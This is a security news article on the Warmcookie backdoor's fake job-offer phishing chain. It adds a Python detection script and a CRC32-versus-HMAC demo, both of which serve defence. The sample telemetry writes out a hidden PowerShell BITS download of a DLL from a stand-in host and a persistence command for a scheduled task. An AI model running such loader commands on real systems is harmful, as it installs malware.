Fake job offers vector for the Warmcookie Windows backdoor

June 17, 2024

The previously unknown Windows malware called Warmcookie is spreading through a phishing campaign built around fake job offers. According to researchers, the backdoor can fingerprint the infected machine, capture screenshots, and deploy additional payloads.

Researchers noted that the campaign sends fraudulent employment and recruitment offers by email under attractive subject lines. The operators reportedly personalise the lures with the recipient's name and current employer.

The emails include a link that supposedly leads to an internal recruitment portal where the target can view the job description. Instead, it redirects the visitor to landing pages that imitate legitimate platforms.

These bogus pages require the user to solve a CAPTCHA before serving an obfuscated JavaScript file with a name such as 'Update_23_04_2024_5689382', a detail intended to add a sense of legitimacy. The CAPTCHA gate also keeps automated crawlers and sandboxes from retrieving the payload.

Once executed, the JavaScript retrieves a PowerShell script that uses the Background Intelligent Transfer Service (BITS) to download the Warmcookie DLL from a URL and runs it with rundll32.exe. The attack chain then copies the Warmcookie payload to C:\ProgramData\RtlUpd\RtlUpd.dll, and the first execution registers a scheduled task named 'RtlUpd' that runs every 10 minutes, giving the backdoor persistence across reboots.

In the final setup step, Warmcookie connects to the attacker-controlled C2 server and begins fingerprinting the victim's system.
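The delivery chain above lends itself to a handful of host-based hunting rules. The following Python is an added example, not code from the original report or from the campaign's own tooling: it runs those rules over constructed Sysmon-style process-creation records. The field names, the `Start-BitsTransfer` command line, the `Start` export passed to rundll32.exe, and the use of schtasks.exe to register the task are assumptions for illustration; the report does not say how the task is created, and a task registered through the Task Scheduler API would surface in Security event 4698 or the TaskScheduler operational log rather than as a schtasks.exe process.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Constructed Sysmon-style (Event ID 1) process-creation record; field names are assumed."""
    image: str          # full path of the new process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Drop location reported for the Warmcookie payload (compared case-insensitively).
DROP_PATH = r"c:\programdata\rtlupd\rtlupd.dll"


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list[str]:
    """Return the names of every hunting rule the event matches (possibly none)."""
    hits: list[str] = []
    img = _basename(ev.image)
    parent = _basename(ev.parent_image)
    cmd = ev.command_line.lower()

    # Stage 1: a script host runs a .js straight out of the user's Downloads folder.
    if img in SCRIPT_HOSTS and re.search(r"\\downloads\\[^\\]+\.js", cmd):
        hits.append("script_host_runs_downloaded_js")

    # Stage 2: that script host spawns PowerShell.
    if img == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawns_powershell")

    # Stage 3: PowerShell pulls a DLL over BITS (cmdlet or bitsadmin.exe).
    if img == "powershell.exe" and re.search(r"start-bitstransfer|bitsadmin", cmd) and ".dll" in cmd:
        hits.append("powershell_bits_dll_download")

    # Stage 4: rundll32 loads a DLL from ProgramData; flag the exact reported path as well.
    if img == "rundll32.exe" and re.search(r"c:\\programdata\\\S+?\.dll", cmd):
        hits.append("rundll32_programdata_dll")
        if DROP_PATH in cmd:
            hits.append("warmcookie_rtlupd_path")

    # Stage 5 (assumed mechanism): the RtlUpd task is registered via schtasks.exe.
    if img == "schtasks.exe" and "/create" in cmd and re.search(r'/tn\s+"?rtlupd\b', cmd):
        hits.append("schtasks_rtlupd_task")

    return hits


# Constructed sample telemetry (not real logs); the last event is a benign rundll32 use.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\jdoe\Downloads\Update_23_04_2024_5689382.js"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -nop -w hidden -c "Import-Module BitsTransfer; '
                 r'Start-BitsTransfer -Source http://example.invalid/u.dll -Destination $env:TEMP\u.dll"',
                 r"C:\Windows\System32\wscript.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\ProgramData\RtlUpd\RtlUpd.dll,Start",   # export name assumed
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /Create /TN RtlUpd /SC MINUTE /MO 10 /TR "rundll32.exe C:\ProgramData\RtlUpd\RtlUpd.dll,Start"',
                 r"C:\Windows\System32\rundll32.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
                 r"C:\Windows\explorer.exe"),
]


def hunt(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Return (image, matched rules) for every event that triggers at least one rule."""
    return [(ev.image, hits) for ev in events if (hits := classify(ev))]


if __name__ == "__main__":
    for image, rules in hunt(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

The first three rules are generic enough to catch other script-to-PowerShell-to-BITS loaders and will need allow-listing in environments that legitimately run scripts from Downloads; the RtlUpd path and task name are the campaign-specific indicators and should be low-noise.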


Warmcookie has a range of capabilities that could lead to severe compromise of an infected host.


Warmcookie is a backdoor that combines several features to gain a foothold, persist, and gather intelligence from victim systems.

In its first action stage the malware collects identifying information about the infected host, including the volume serial number, DNS domain, machine name, and username, then encrypts the data and sends it to the C2 inside the cookie parameter of an HTTP request.

The malware also validates every received command with a CRC32 checksum. Note that CRC32 detects accidental corruption, not deliberate tampering: anyone able to alter the command can recompute the checksum, so this is an integrity check on the transport rather than authentication of the operator. In addition, Warmcookie refuses to run if the CPU count or the physical/virtual memory values fall below predefined thresholds, a common check for sandbox and analysis environments.
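To make the checksum caveat concrete, here is an added Python example, not Warmcookie's code (the report does not describe its command format), comparing a CRC32-framed command with an HMAC-framed one. The frame layouts (checksum or tag followed by the command bytes), the shared key and the command strings are assumptions for the demonstration.

```python
import hashlib
import hmac
import struct
import zlib

# Assumed frame layout for the demonstration: 4-byte little-endian CRC32, then the command.


def frame_crc(command: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(command)) + command


def verify_crc(frame: bytes) -> bool:
    """Accept the frame if the stored CRC32 matches the body. Catches corruption only."""
    if len(frame) < 4:
        return False
    (stored,) = struct.unpack("<I", frame[:4])
    return zlib.crc32(frame[4:]) == stored


def forge_crc(new_command: bytes) -> bytes:
    """An attacker who can rewrite traffic needs no secret: just recompute the CRC."""
    return frame_crc(new_command)


def corrupt(frame: bytes) -> bytes:
    """Flip one bit in the body, as line noise might; CRC32 is designed to catch this."""
    body = bytearray(frame)
    body[-1] ^= 0x01
    return bytes(body)


# Alternative layout: 32-byte HMAC-SHA256 tag under a shared key, then the command.
TAG_LEN = 32


def frame_hmac(key: bytes, command: bytes) -> bytes:
    return hmac.new(key, command, hashlib.sha256).digest() + command


def verify_hmac(key: bytes, frame: bytes) -> bool:
    """Accept only if the tag was produced by someone holding the key."""
    if len(frame) < TAG_LEN:
        return False
    tag, body = frame[:TAG_LEN], frame[TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected)


def forge_hmac_without_key(frame: bytes, new_command: bytes) -> bytes:
    """The best an attacker without the key can do: reuse the old tag on a new body."""
    return frame[:TAG_LEN] + new_command


if __name__ == "__main__":
    key = b"constructed-shared-key"   # assumption for the demo, not a real key
    legit = frame_crc(b"screenshot")
    print("crc ok:", verify_crc(legit))
    print("crc corrupted:", verify_crc(corrupt(legit)))
    print("crc forged:", verify_crc(forge_crc(b"load payload.dll")))   # still accepted
    mac = frame_hmac(key, b"screenshot")
    print("hmac ok:", verify_hmac(key, mac))
    print("hmac forged:", verify_hmac(key, forge_hmac_without_key(mac, b"load payload.dll")))
```

The point for defenders is that a CRC32 on the command stream says nothing about who is issuing commands; it only means the operators cared about corrupted tasking, which in turn suggests the tasking channel is otherwise unauthenticated unless the surrounding encryption supplies that property.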

Despite being a new payload, Warmcookie is already capable of inflicting serious damage, particularly through its ability to deliver additional payloads. Security providers and organisations should treat it as a formidable threat and hunt for the indicators described above: the RtlUpd scheduled task and DLL path, BITS downloads launched from PowerShell, and rundll32.exe loading DLLs out of ProgramData.
